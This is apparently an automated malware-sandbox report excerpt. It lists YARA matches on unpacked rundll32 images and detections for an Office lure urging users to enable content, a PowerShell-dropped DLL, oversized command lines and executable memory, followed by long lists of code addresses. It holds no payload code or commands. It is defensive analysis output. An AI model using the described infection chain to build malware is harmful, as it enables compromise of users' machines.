                      Source: Yara matchFile source: 22.2.rundll32.exe.450000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.4a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rundll32.exe.2010000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.6b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.280000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.460000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.280000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.430000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.750000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.rundll32.exe.450000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.460000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.2f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.280000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.rundll32.exe.550000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.2b0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE

                      System Summary:

                      barindex
                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                      Source: Screenshot number: 4Screenshot OCR: Enable Editing and Enable Content. 0 Page, I of I Words: 8,746 ,9 N@m 13 ;a 10096 G) FI G)
                      Source: Screenshot number: 4Screenshot OCR: Enable Content. 0 Page, I of I Words: 8,746 ,9 N@m 13 ;a 10096 G) FI G) ,, . ZE iss ,,gS
                      Source: Screenshot number: 8Screenshot OCR: Enable Editing and Enable Content. a nmmm O I @ 100% G) A GE)
                      Source: Screenshot number: 8Screenshot OCR: Enable Content. a nmmm O I @ 100% G) A GE)
                      Source: Document image extraction number: 0Screenshot OCR: Enable Editing and Enable Content.
                      Source: Document image extraction number: 0Screenshot OCR: Enable Content.
                      Source: Document image extraction number: 1Screenshot OCR: Enable Editing and Enable Content.
                      Source: Document image extraction number: 1Screenshot OCR: Enable Content.
                      Powershell drops PE fileShow sources
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dllJump to dropped file
                      Very long command line foundShow sources
                      Source: unknownProcess created: Commandline size = 5669
                      Source: unknownProcess created: Commandline size = 5568
                      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5568
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Eahqlsuythns\Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00436417
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0044A0F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00434844
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0043E044
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00445250
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00440672
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0043BE74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0043327F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0044AA7B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00442C05
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00431806
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00432208
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0043240F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0043E612
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00435418
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0043A821
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00440223
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0044D02D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00448C2B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00444C37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00442631
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00448A33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0043A6C9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0043A2D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0044C6D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0043D2DD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0044D4E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0043D6F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0043ECFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0043DE81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00441090
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00444A9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0043CAA3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0043C145
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0044434E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00443F4F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00449B4A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0044135B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0044B165
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0044A966
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0043C364
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0043F369
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00433B74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00437378
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00435B7D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00444F04
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00439106
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00435F04
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0044D70B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0043A525
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00439D2F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00437731
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0044CF31
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00433336
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00437B39
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00433938
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0044DBC4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004357D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00432DDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00446BE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0044CBE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0043F5E0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004367EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0044BBF1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00441DFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00437FFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004335FC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00447187
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00441F88
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00440B8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00434D90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00443590
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0043BB96
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0044C192
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00442FA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00433FAF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0043ADAF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004493AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004447B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0043F9BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0043FFBA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00447BBE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00449DBF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004409B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017C017
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00184012
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00180604
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00179C3D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017C851
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0018CA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00179846
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0018BC4D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00184478
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017E272
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0018CC7F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00175478
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00189665
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00179A99
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001890BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001834BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017B6B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00176CA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001792A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001770AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00172EAC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0018C4A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001728AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0018A6D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00189EDA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017E8DD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017B8D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001808CF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001838C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001834C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001866FB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001814FC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001800FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001750F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001768EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001730E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0018891E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00182515
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00174304
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017B10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0018B706
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0018D138
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00187132
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00189333
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00183D29
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00173523
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017A323
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017EF2E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017F52E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017FF2C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00186158
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0018C15B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017EB54
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00172353
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00174D48
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00182179
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00172B70
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00181372
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017177C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00170D7A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00175D63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0018B165
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017F797
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00179D95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017F793
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0018819F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017DB86
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00171983
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017498C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017598B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00173DB8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017D5B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001841AB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0018C5A1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00181BA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00187FA7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017D3F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001727F3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017FBE6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017B3E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0046303C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00471E14
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00404844
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00415250
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00406417
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0040A821
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0040D2DD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0041A0F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0040CAA3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00405F04
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0041CBE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00410B8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00404D90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_004147B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0040E044
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00410672
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0040BE74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0041AA7B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0040327F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00412C05
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00401806
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00402208
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0040240F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0040E612
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00405418
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00410223
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00418C2B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0041D02D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00412631
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00418A33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00414C37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0040A6C9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0040A2D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0041C6D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0041D4E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0040D6F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0040ECFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0040DE81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00411090
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00414A9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0040C145
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00419B4A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00413F4F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0041434E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0041135B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0040C364
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0041B165
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0041A966
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0040F369
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00403B74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00407378
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00405B7D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00414F04
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00409106
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0041D70B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0040A525
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00409D2F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0041CF31
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00407731
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00403336
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00403938
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00407B39
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0041DBC4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_004057D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00402DDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0040F5E0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00416BE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_004067EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0041BBF1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_004035FC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00407FFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00411DFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00417187
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00411F88
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00413590
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0041C192
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0040BB96
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00412FA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_004193AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00403FAF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0040ADAF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_004109B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0040F9BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0040FFBA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00419DBF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00417BBE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001FC017
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F9C3D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00200604
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00204012
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00209665
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001FC851
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00204478
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F9846
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0020CC7F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F5478
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001FE272
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0020BC4D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0020CA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0020C4A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F9A99
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002090BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002034BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001FB6B9
